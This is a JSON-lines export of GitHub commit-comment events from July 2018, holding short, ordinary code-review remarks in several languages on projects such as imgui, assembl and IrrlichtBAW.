{"id":"8029165586","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859870,"position":6,"line":1022,"path":"imgui_draw.cpp","commit_id":"fd09b3ad0321fb0134039b13d0398d8462751ee2","created_at":"2018-07-27T15:09:32Z","updated_at":"2018-07-27T15:09:32Z","author_association":"NONE","body":"It's ok if it accesses TexUvRoundedCorner.\r\n\r\nI am currently considering removing WindowRounding capabilities... it is causing too many constraints and in particular it is problematic with the Viewport branch (requires alpha compositing with the OS to get the rounded shape) so right now in my test I am always setting WindowRounding=0.0 in the viewport branch.\r\nIt's also maybe title bar/window rendering code generally more complex..\r\nWill create a thread to discuss the idea of removing it in the future.\r\n"}},"created_at":"2018-07-27T15:09:32Z"}
{"id":"8029165847","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859872,"position":95,"line":1070,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T15:09:35Z","updated_at":"2018-07-27T15:09:35Z","author_association":"OWNER","body":"Okay, already doing that on HEAD."}},"created_at":"2018-07-27T15:09:35Z"}
{"id":"8029167696","type":"CommitCommentEvent","actor":{"login":"jimhester"},"repo":{"name":"tidyverse/glue"},"payload":{"comment":{"id":29859878,"position":11,"line":32,"path":"tests/testthat/test-sql.R","commit_id":"ea29e09fc6f685c9d7c33068e5017c1c14544c46","created_at":"2018-07-27T15:09:54Z","updated_at":"2018-07-27T15:09:54Z","author_association":"MEMBER","body":"Thanks!"}},"created_at":"2018-07-27T15:09:54Z"}
{"id":"8029169542","type":"CommitCommentEvent","actor":{"login":"lukasz-dobosz-c"},"repo":{"name":"cex-k13/flickr"},"payload":{"comment":{"id":29859889,"position":24,"line":24,"path":"src/app/services/flickr.service.ts","commit_id":"76ff0907d763be0038c9fcfff504bc65bfdb7c9c","created_at":"2018-07-27T15:10:14Z","updated_at":"2018-07-27T15:10:14Z","author_association":"NONE","body":"tutaj mogłoby być po prosty `val.photos.photo.map(...)`\r\nnatomiast jeszcze zanim zrobisz `val.photos.photo.map`, to musisz sprawdzic czy masz `val.photos` i `val.photos.photo`, bo jak którejś z tych wartosci bedzie zdefiniowanej albo bedzie falsy to wywali błedem"}},"created_at":"2018-07-27T15:10:14Z"}
{"id":"8029170034","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29859890,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T15:10:19Z","updated_at":"2018-07-27T15:10:19Z","author_association":"OWNER","body":"So the passed function would be responsible for what actually? Action on object before being removed from container?"}},"created_at":"2018-07-27T15:10:19Z"}
{"id":"8029172843","type":"CommitCommentEvent","actor":{"login":"Mac7919"},"repo":{"name":"Mac7919/JustHello"},"payload":{"comment":{"id":29859899,"position":9,"line":9,"path":"Hello_c++.h","commit_id":"1c230ad9a626a95fcb1e1a38fb4c8ff0eb88bf95","created_at":"2018-07-27T15:10:50Z","updated_at":"2018-07-27T15:10:50Z","author_association":"OWNER","body":"funny how this looks easy now."}},"created_at":"2018-07-27T15:10:50Z"}
{"id":"8029173989","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29859901,"position":38,"line":38,"path":"lesson4/route.rb","commit_id":"433740219ec600963c04be5e3581806f1ed93d0f","created_at":"2018-07-27T15:11:02Z","updated_at":"2018-07-27T15:11:02Z","author_association":"NONE","body":"здесь видимо не `unless`, а `if`"}},"created_at":"2018-07-27T15:11:02Z"}
{"id":"8029174989","type":"CommitCommentEvent","actor":{"login":"lukasz-dobosz-c"},"repo":{"name":"cex-k13/flickr"},"payload":{"comment":{"id":29859902,"position":20,"line":20,"path":"src/app/services/flickr.service.ts","commit_id":"76ff0907d763be0038c9fcfff504bc65bfdb7c9c","created_at":"2018-07-27T15:11:12Z","updated_at":"2018-07-27T15:11:12Z","author_association":"NONE","body":"tutaj pipe nam nic nie da? bo mamy tylko jedną funkcje w środku, nie?"}},"created_at":"2018-07-27T15:11:12Z"}
{"id":"8029176250","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859906,"position":6,"line":1022,"path":"imgui_draw.cpp","commit_id":"fd09b3ad0321fb0134039b13d0398d8462751ee2","created_at":"2018-07-27T15:11:26Z","updated_at":"2018-07-27T15:11:26Z","author_association":"OWNER","body":"Perfect. I'll move it out.\r\n\r\nInteresting. It's always nice to have a good reason to remove things :)"}},"created_at":"2018-07-27T15:11:26Z"}
{"id":"8029177738","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29859909,"position":null,"line":null,"path":null,"commit_id":"ac75a041048b8c1f7418e27621ca5efda8571043","created_at":"2018-07-27T15:11:42Z","updated_at":"2018-07-27T15:11:42Z","author_association":"NONE","body":"I have to `rmmod i2c_hid`, then `modprobe i2c_hid`, then suspend, then wakeup to make work again."}},"created_at":"2018-07-27T15:11:42Z"}
{"id":"8029179263","type":"CommitCommentEvent","actor":{"login":"lukasz-dobosz-c"},"repo":{"name":"cex-k13/flickr"},"payload":{"comment":{"id":29859911,"position":26,"line":26,"path":"src/app/services/flickr.service.ts","commit_id":"76ff0907d763be0038c9fcfff504bc65bfdb7c9c","created_at":"2018-07-27T15:11:59Z","updated_at":"2018-07-27T15:11:59Z","author_association":"NONE","body":"zrobiłbym funkcje, która przyjmuje farm, server, id i secret\r\ni zwraca ten url, byłoby bardziej czytelnie"}},"created_at":"2018-07-27T15:11:59Z"}
{"id":"8029180149","type":"CommitCommentEvent","actor":{"login":"zakons"},"repo":{"name":"GoogleCloudPlatform/google-cloud-python"},"payload":{"comment":{"id":29859914,"position":4,"line":80,"path":"bigtable/google/cloud/bigtable/batcher.py","commit_id":"242761a10d581943588f791080c80515ed4707d0","created_at":"2018-07-27T15:12:10Z","updated_at":"2018-07-27T15:12:10Z","author_association":"CONTRIBUTOR","body":"Mutations spelling needs correction."}},"created_at":"2018-07-27T15:12:10Z"}
{"id":"8029182145","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859919,"position":null,"line":null,"path":null,"commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:12:31Z","updated_at":"2018-07-27T15:12:31Z","author_association":"CONTRIBUTOR","body":"@ayyazdaniaryan  Why the Reject actions? Can't we just tombstone the Accepted action?"}},"created_at":"2018-07-27T15:12:31Z"}
{"id":"8029184381","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/activityinfo"},"payload":{"comment":{"id":29859924,"position":null,"line":null,"path":null,"commit_id":"0bc703497128221cfb177b6086ce2423389ef567","created_at":"2018-07-27T15:12:56Z","updated_at":"2018-07-27T15:12:56Z","author_association":"MEMBER","body":"Using the constant is good practice, but just avoid using an internal package. You are looking for com.google.common.base.Charsets#UTF_8"}},"created_at":"2018-07-27T15:12:56Z"}
{"id":"8029185892","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"BobZmotion/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":29859926,"position":null,"line":null,"path":null,"commit_id":"0a6a1acfc984751cbdfc1e97565013aa05a49e60","created_at":"2018-07-27T15:13:14Z","updated_at":"2018-07-27T15:13:14Z","author_association":"NONE","body":"You missed this one, https://github.com/LineageOS/android_kernel_oneplus_msm8994/commit/1b386d82549863cf936628908963b01f98236d23, resulting in video recording broken after suspend."}},"created_at":"2018-07-27T15:13:14Z"}
{"id":"8029187890","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29859931,"position":null,"line":null,"path":null,"commit_id":"f05aee0f012779e9f07d10cc3becca7fbd20080b","created_at":"2018-07-27T15:13:36Z","updated_at":"2018-07-27T15:13:36Z","author_association":"MEMBER","body":"@zsrkmyn Sorry， `pre-commit`的軟鏈地址沒弄對"}},"created_at":"2018-07-27T15:13:36Z"}
{"id":"8029188499","type":"CommitCommentEvent","actor":{"login":"lukasz-dobosz-c"},"repo":{"name":"cex-k13/flickr"},"payload":{"comment":{"id":29859932,"position":22,"line":22,"path":"src/app/services/flickr.service.ts","commit_id":"76ff0907d763be0038c9fcfff504bc65bfdb7c9c","created_at":"2018-07-27T15:13:43Z","updated_at":"2018-07-27T15:13:43Z","author_association":"NONE","body":"1. generalnie jak masz obiekty to używamy `val.stat` zeby wyciągnąc ich pola zamiast `val['stat']`\r\n2. 'ok' mogłoby być jakims enumem, ładniej by wyglądało, np. Status.OK\r\n  ```enum Status {\r\n     OK = 'ok',\r\n    NOT_OK = 'sth_not_ok'\r\n  }```"}},"created_at":"2018-07-27T15:13:43Z"}
{"id":"8029188808","type":"CommitCommentEvent","actor":{"login":"RezYlander"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29859936,"position":19,"line":12,"path":"src/index.html","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T15:13:47Z","updated_at":"2018-07-27T15:13:47Z","author_association":"OWNER","body":"classs do stylowania, id dla js-a\r\n"}},"created_at":"2018-07-27T15:13:47Z"}
{"id":"8029190581","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859941,"position":48,"line":89,"path":"assembl/tests/views_tests/test_graphql_user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:14:07Z","updated_at":"2018-07-27T15:14:07Z","author_association":"CONTRIBUTOR","body":"If this is the same as the DeleteAcceptedCookiesByUser.graphql file, you should use the graphql_registry fixture in the tests to read the query from the DeleteAcceptedCookiesByUser.graphql and not duplicate it here."}},"created_at":"2018-07-27T15:14:07Z"}
{"id":"8029191286","type":"CommitCommentEvent","actor":{"login":"kamilgregorczyk"},"repo":{"name":"jankubierecki/UEKPartnership"},"payload":{"comment":{"id":29859946,"position":93,"line":93,"path":"company/tests.py","commit_id":"9a833d5ec65fee246bfb71a29ebf5ff82e44c1dd","created_at":"2018-07-27T15:14:15Z","updated_at":"2018-07-27T15:14:15Z","author_association":"COLLABORATOR","body":".delete()"}},"created_at":"2018-07-27T15:14:15Z"}
{"id":"8029193222","type":"CommitCommentEvent","actor":{"login":"lukasz-dobosz-c"},"repo":{"name":"cex-k13/flickr"},"payload":{"comment":{"id":29859950,"position":17,"line":17,"path":"src/app/services/flickr.service.ts","commit_id":"76ff0907d763be0038c9fcfff504bc65bfdb7c9c","created_at":"2018-07-27T15:14:36Z","updated_at":"2018-07-27T15:14:36Z","author_association":"NONE","body":"zrobiłbym funkcje, która przyjmuje apiKey, tag\r\ni zwraca ten url, byłoby bardziej czytelnie"}},"created_at":"2018-07-27T15:14:36Z"}
{"id":"8029194754","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29859954,"position":19,"line":12,"path":"src/index.html","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T15:14:53Z","updated_at":"2018-07-27T15:14:53Z","author_association":"NONE","body":"nie wolno mieć na stronie kilka id, a tak niestety będzie kiedy będziesz mieć kilka sliderów na stronie\r\n"}},"created_at":"2018-07-27T15:14:53Z"}
{"id":"8029197742","type":"CommitCommentEvent","actor":{"login":"akshaymittal143"},"repo":{"name":"akshaymittal143/vidAbility"},"payload":{"comment":{"id":29859965,"position":null,"line":null,"path":null,"commit_id":"e05c3725f05521c09c2bb694b87737999b2ae109","created_at":"2018-07-27T15:15:26Z","updated_at":"2018-07-27T15:15:26Z","author_association":"OWNER","body":"great!!"}},"created_at":"2018-07-27T15:15:26Z"}
{"id":"8029200484","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859970,"position":54,"line":306,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:15:54Z","updated_at":"2018-07-27T15:15:54Z","author_association":"MEMBER","body":"Okay, so I think you're almost on the right track. But, consider for a moment if the API caller tried to pass a random action string instead of the acceptable set. We have graphQL, which is a type-safe API. This malicious call already passes through due to the `String()` type on action, instead of an `Enum` type. So, the call is made, and `update_cookies`, which we agreed, will only operate on `CookieType` enums throws an error due to the malicious string input. This is code smell, and sharing responsibilities to objects that shouldn't have one. You should consider converting the `action_type`string to an Enum here, in the API call, and throw an error (Fail fast, fail hard principle). The `update_cookies`  can just do a check that their incoming input `isinstance(input, CookieType)`. "}},"created_at":"2018-07-27T15:15:54Z"}
{"id":"8029200552","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29859971,"position":null,"line":null,"path":null,"commit_id":"f1ae1d5c3dd0a2d8df5f029967575bd61fdba089","created_at":"2018-07-27T15:15:55Z","updated_at":"2018-07-27T15:15:55Z","author_association":"OWNER","body":"@tranconghau , @nguyenhien1994 \r\n\r\nI just help to complete Hien's idea"}},"created_at":"2018-07-27T15:15:55Z"}
{"id":"8029206529","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859976,"position":null,"line":null,"path":null,"commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:16:53Z","updated_at":"2018-07-27T15:16:53Z","author_association":"CONTRIBUTOR","body":"ah, if the user never accepted a cookie, and you want to save the reject, you can't tombstone an accepted action"}},"created_at":"2018-07-27T15:16:53Z"}
{"id":"8029212418","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859985,"position":54,"line":306,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:17:49Z","updated_at":"2018-07-27T15:17:49Z","author_association":"MEMBER","body":"AND, it would be consistent with the docstrings of the `update_cookie` function."}},"created_at":"2018-07-27T15:17:49Z"}
{"id":"8029217632","type":"CommitCommentEvent","actor":{"login":"looselyrigorous"},"repo":{"name":"ToLABaki/tolabaki_admin"},"payload":{"comment":{"id":29859995,"position":4,"line":14,"path":"roles/dns_server/files/docker/Dockerfile","commit_id":"1e0e301a8b22555ae94d6eeef7b880ea964005f6","created_at":"2018-07-27T15:18:44Z","updated_at":"2018-07-27T15:18:44Z","author_association":"CONTRIBUTOR","body":"Yes, this is very hacky, definitely don't want to keep this. I was only trying to make this work with the least changes possible.\r\n\r\nA more \"correct\" approach might be to:\r\n1. Dynamically chown and chmod appropriately, which would require an init shell script (that exec's named at the end)\r\n2. Do the above in the image build process.\r\n\r\nI prefer solution 1 because we're not constrained to one set of UID:GID."}},"created_at":"2018-07-27T15:18:44Z"}
{"id":"8029218360","type":"CommitCommentEvent","actor":{"login":"SOROFF"},"repo":{"name":"SOROFF/SensorFusion"},"payload":{"comment":{"id":29859997,"position":4,"line":5,"path":"helloworld.m","commit_id":"77a8a28a3e63cffcb7c04c1ebeca761eaf7da6c6","created_at":"2018-07-27T15:18:52Z","updated_at":"2018-07-27T15:18:52Z","author_association":"OWNER","body":"I can leave comments"}},"created_at":"2018-07-27T15:18:52Z"}
{"id":"8029225516","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29860011,"position":54,"line":306,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:20:12Z","updated_at":"2018-07-27T15:20:12Z","author_association":"CONTRIBUTOR","body":"Yes, definitely use a graphql enum for action_type here, see PublicationStates enum in graphql/post.py for an example."}},"created_at":"2018-07-27T15:20:12Z"}
{"id":"8029228805","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29860017,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T15:20:46Z","updated_at":"2018-07-27T15:20:46Z","author_association":"OWNER","body":"IMO the first one is better since it doesn't cause a risk of circullar `#include`s (I'd have to `#include` `IIrrlichtDevice` in cache's header file to do anything with the device) and also avoids need to specialize this `dispose` function which could be extremely ugly in this case."}},"created_at":"2018-07-27T15:20:46Z"}
{"id":"8029230477","type":"CommitCommentEvent","actor":{"login":"gilmartmd"},"repo":{"name":"gilmartmd/XunitDemo"},"payload":{"comment":{"id":29860022,"position":null,"line":null,"path":null,"commit_id":"251ba2745a89ee6abe9b6b38b1d8376e7f2a80e5","created_at":"2018-07-27T15:21:06Z","updated_at":"2018-07-27T15:21:06Z","author_association":"OWNER","body":"o Xunit provê uma injeção de dependência básica por construtor e disponibiliza um ITestOutputHelper, além de trabalhar com o padrão Disposable para liberar recursos."}},"created_at":"2018-07-27T15:21:06Z"}
{"id":"8029232721","type":"CommitCommentEvent","actor":{"login":"AppreciateIT"},"repo":{"name":"goalgorilla/open_social"},"payload":{"comment":{"id":29860030,"position":null,"line":null,"path":null,"commit_id":"3419e95f4cfbc0564aa53932b8d2459bc68d85a8","created_at":"2018-07-27T15:21:31Z","updated_at":"2018-07-27T15:21:31Z","author_association":"NONE","body":"Shouldn't the styleguide be NOT ignored in GIT?  \r\nIt changes when you change the source and is needed by developers."}},"created_at":"2018-07-27T15:21:31Z"}
{"id":"8029237628","type":"CommitCommentEvent","actor":{"login":"OakTwo"},"repo":{"name":"MrSprigster/Twitch-on-Kodi"},"payload":{"comment":{"id":29860045,"position":null,"line":null,"path":null,"commit_id":"8d105fdeef51bcd2cc39cd663bd2dab71ec1ea22","created_at":"2018-07-27T15:22:25Z","updated_at":"2018-07-27T15:22:25Z","author_association":"NONE","body":"Just to confirm this works for me - just manually patching routes.py - and that's an amazingly quick fix, thank you."}},"created_at":"2018-07-27T15:22:25Z"}
{"id":"8029241732","type":"CommitCommentEvent","actor":{"login":"Kalaborative"},"repo":{"name":"Kalaborative/survivio-cheat"},"payload":{"comment":{"id":29860053,"position":null,"line":null,"path":null,"commit_id":"3eddd5609b705805911637c65610d08de9d7b70b","created_at":"2018-07-27T15:23:08Z","updated_at":"2018-07-27T15:23:08Z","author_association":"OWNER","body":"#3 "}},"created_at":"2018-07-27T15:23:08Z"}
{"id":"8029242407","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29860054,"position":47,"line":47,"path":"Blog/view/adminhtml/ui_component/blog_post_listing.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T15:23:15Z","updated_at":"2018-07-27T15:23:15Z","author_association":"OWNER","body":"These are Default View section\r\nnamespace must match name used in layout file."}},"created_at":"2018-07-27T15:23:15Z"}
{"id":"8029243586","type":"CommitCommentEvent","actor":{"login":"MCdirtyjob"},"repo":{"name":"MCdirtyjob/cts-course-dj"},"payload":{"comment":{"id":29860055,"position":null,"line":null,"path":null,"commit_id":"bfe31ed0f4d0c59b9f689f2e88c4337d44c9babf","created_at":"2018-07-27T15:23:28Z","updated_at":"2018-07-27T15:23:28Z","author_association":"OWNER","body":"Commit has a gramatical error. \r\nClass-Scheduling-Application [React Redux]"}},"created_at":"2018-07-27T15:23:28Z"}
{"id":"8029244626","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29860058,"position":41,"line":41,"path":"Blog/view/adminhtml/ui_component/blog_post_listing.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T15:23:39Z","updated_at":"2018-07-27T15:23:39Z","author_association":"OWNER","body":"Actions Toolbar"}},"created_at":"2018-07-27T15:23:39Z"}
{"id":"8029246409","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29860061,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-27T15:23:59Z","updated_at":"2018-07-27T15:23:59Z","author_association":"COLLABORATOR","body":"Да отлично вроде получилось. Я тоже так планировал делать. Т.е. кодируем в GrenadeMode тип заряда, кол-во зарядов и режим. Нормально. Совместимость вроде не страдает. Единственное, что в голову приходит, так это то, что на тип отводится 2 бита и 5 на кол-во. Правильно? В этом случае наверное имеет смысл добавить ассертов, где эти параметры читаются из конфига, что бы ни у кого сюрпризов не было. Я имею ввиду grenade_class, что бы там никто случайно не указал более 4 элементов. А кстати, зачем 5 бит на кол-во? Подствольная граната же одна. Или это на будущее?\r\n"}},"created_at":"2018-07-27T15:23:59Z"}
{"id":"8029279956","type":"CommitCommentEvent","actor":{"login":"Zaryus"},"repo":{"name":"Zaryus/PRUEBA"},"payload":{"comment":{"id":29860124,"position":null,"line":null,"path":null,"commit_id":"e13f8a2db9bbf5067f3a49f7b63a14dc5c361361","created_at":"2018-07-27T15:29:51Z","updated_at":"2018-07-27T15:29:51Z","author_association":"OWNER","body":"XD\r\n"}},"created_at":"2018-07-27T15:29:51Z"}
{"id":"8029283199","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29860135,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T15:30:25Z","updated_at":"2018-07-27T15:30:25Z","author_association":"NONE","body":"yes but a template argument function could not provide stuff like IVideoDriver for the deletion by itself, you'd need an std::functional which is dynamic so it couldn't be a template argument.\r\n\r\nWith a variadic template you could most probably just manage to make something slightly pretty."}},"created_at":"2018-07-27T15:30:25Z"}
{"id":"8029284928","type":"CommitCommentEvent","actor":{"login":"BobZmotion"},"repo":{"name":"BobZmotion/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":29860143,"position":null,"line":null,"path":null,"commit_id":"0a6a1acfc984751cbdfc1e97565013aa05a49e60","created_at":"2018-07-27T15:30:43Z","updated_at":"2018-07-27T15:30:43Z","author_association":"OWNER","body":"Thank you!"}},"created_at":"2018-07-27T15:30:43Z"}
{"id":"8029286459","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29860149,"position":19,"line":12,"path":"src/index.html","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T15:31:00Z","updated_at":"2018-07-27T15:31:00Z","author_association":"NONE","body":"moja sprawa? okey... to powodzenia"}},"created_at":"2018-07-27T15:31:00Z"}
{"id":"8029288013","type":"CommitCommentEvent","actor":{"login":"dougalsutherland"},"repo":{"name":"conda-forge/conda-forge-webservices"},"payload":{"comment":{"id":29860153,"position":null,"line":null,"path":null,"commit_id":"b497e0914e7c803f69ca460b6fd1d6bc3d15156d","created_at":"2018-07-27T15:31:19Z","updated_at":"2018-07-27T15:31:19Z","author_association":"CONTRIBUTOR","body":"I think the advantage of empty commits is that rebuilds then can be done by anyone with push access to this repo, rather than requiring distributing/dealing with Heroku credentials + API. Maybe that's less of an issue for the app updating itself, though."}},"created_at":"2018-07-27T15:31:19Z"}
{"id":"8029294273","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29860168,"position":null,"line":null,"path":null,"commit_id":"2723c19d5ca72e8e0383dc00d4ae1ccf8875a53c","created_at":"2018-07-27T15:32:29Z","updated_at":"2018-07-27T15:32:29Z","author_association":"COLLABORATOR","body":"It is.  Breaking it down it looks like ~1/3 of that is in the `numpy.fft.fftshift` call.  The bulk of it is probably in the copy."}},"created_at":"2018-07-27T15:32:29Z"}
{"id":"8029296250","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29860175,"position":null,"line":null,"path":null,"commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:32:50Z","updated_at":"2018-07-27T15:32:50Z","author_association":"MEMBER","body":"Exactly the second point. This is for auditing purposes in the future."}},"created_at":"2018-07-27T15:32:50Z"}
{"id":"8029298587","type":"CommitCommentEvent","actor":{"login":"Ant-o"},"repo":{"name":"Ant-o/jubilant-octo-pancake"},"payload":{"comment":{"id":29860180,"position":null,"line":null,"path":null,"commit_id":"4f624724f6f21583c2cfb997d1fcc8c2d75c41ba","created_at":"2018-07-27T15:33:18Z","updated_at":"2018-07-27T15:33:18Z","author_association":"OWNER","body":"Call the cats matezz"}},"created_at":"2018-07-27T15:33:18Z"}
{"id":"8029302517","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29860192,"position":null,"line":null,"path":null,"commit_id":"2723c19d5ca72e8e0383dc00d4ae1ccf8875a53c","created_at":"2018-07-27T15:34:06Z","updated_at":"2018-07-27T15:34:06Z","author_association":"COLLABORATOR","body":"Hmm okay, plenty to talk about on the call.\n\n> On 27 Jul 2018, at 09:32, jaycedowell <notifications@github.com> wrote:\n> \n> It is. Breaking it down it looks like ~1/3 of that is in the numpy.fft.fftshift call. The bulk of it is probably in the copy.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/2723c19d5ca72e8e0383dc00d4ae1ccf8875a53c#commitcomment-29860168>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hCR08Yld0qjutqTSDic2_wTdoXc5ks5uKzKPgaJpZM4VjsPB>.\n> \n\n"}},"created_at":"2018-07-27T15:34:06Z"}
{"id":"8029303897","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29860199,"position":18,"line":18,"path":"Lesson_5/lib/train.rb","commit_id":"ea8de439cda308982ab375ac00a0f928aa4afde3","created_at":"2018-07-27T15:34:22Z","updated_at":"2018-07-27T15:34:22Z","author_association":"NONE","body":"метод `Train.find` лучше сделать через хеш, т.е. хранить инстансы поездов в хеше, где номер поезда - это ключ, а значение - сам объект\r\nтогда поиск будет просто поиском по ключу и при этом будет очень эффективным, т.к. хеш заточен на эту операцию"}},"created_at":"2018-07-27T15:34:22Z"}
{"id":"8029308516","type":"CommitCommentEvent","actor":{"login":"birm"},"repo":{"name":"camicroscope/caMicroscope"},"payload":{"comment":{"id":29860206,"position":null,"line":null,"path":null,"commit_id":"77da256b91d26c15fc97431278dd9ae2c11a6790","created_at":"2018-07-27T15:35:15Z","updated_at":"2018-07-27T15:35:15Z","author_association":"MEMBER","body":"glad you got commit access :)"}},"created_at":"2018-07-27T15:35:15Z"}
{"id":"8029308766","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-minos"},"payload":{"comment":{"id":29860207,"position":null,"line":null,"path":null,"commit_id":"9c084f38b97c7b516c0c0d0e8c3049db1375bc66","created_at":"2018-07-27T15:35:17Z","updated_at":"2018-07-27T15:35:17Z","author_association":"OWNER","body":"#55 "}},"created_at":"2018-07-27T15:35:17Z"}
{"id":"8029309728","type":"CommitCommentEvent","actor":{"login":"jaredrcleghorn"},"repo":{"name":"UA-ACM-Student-Chapter/UA-ACM-Student-Chapter.github.io"},"payload":{"comment":{"id":29860210,"position":null,"line":null,"path":null,"commit_id":"a8f0a8faf2ac79bbcef4bb283835764c16e0c6a0","created_at":"2018-07-27T15:35:28Z","updated_at":"2018-07-27T15:35:28Z","author_association":"NONE","body":"Thanks for the feedback David! \r\n\r\nThe first thing I'll probably look at is getting rid of the Google API Client Library; it should be pretty simple to achieve the same functionality with standard AJAX calls, and it would definitely be worth it if its causing that much of a performance issue. Also, by the way, the reason that I didn't use the formatting library that was being used before was because I just found it easier to use the Google Calendar API directly that to use that library as a layer on top of the API, especially since I was trying to style the markup that it was producing. But we can definitely go back to using it if you think that there's a compelling reason to do so.\r\n\r\nAs far as the scroll bars, what I wanted to do was have the bottom (black) portion of the tiles be scrollable, since some of the locations are full addresses and therefore pretty long. That way the tiles themselves could have a fixed height and they would all line up nicely and adjust well to different screen sizes. The scroll bars didn't look bad in any of the browsers I have, but you're defiantly right, they look pretty bad in that picture, so I will remove the scrolling, but I'll still have to find some way to deal with the variable content. If you've got any ideas, I'm all ears.\r\n\r\nI'm honestly fine with removing the white border on the bottom, I was kind of going back and forth about whether I liked it better with it or without it anyway. What I really wanted to do was give the top red part a bottom box shadow to make it look like it was above the black part, but I couldn't really figure out how to achieve that affect with the bottom part being black.\r\n\r\nRegarding the fonts, I was really just kind of screwing around with fonts to see what looked cool, the ones I used don't really match the site at the moment, so I wasn't necessarily even planning on keeping those in there. With that being said, I do think it's worth it to use at least one custom font for all the headings and stuff, but if we're concerned about the load time I think we could probably get away with just using the default sans-serif font or something for regular text on the site without it looking too bland."}},"created_at":"2018-07-27T15:35:28Z"}
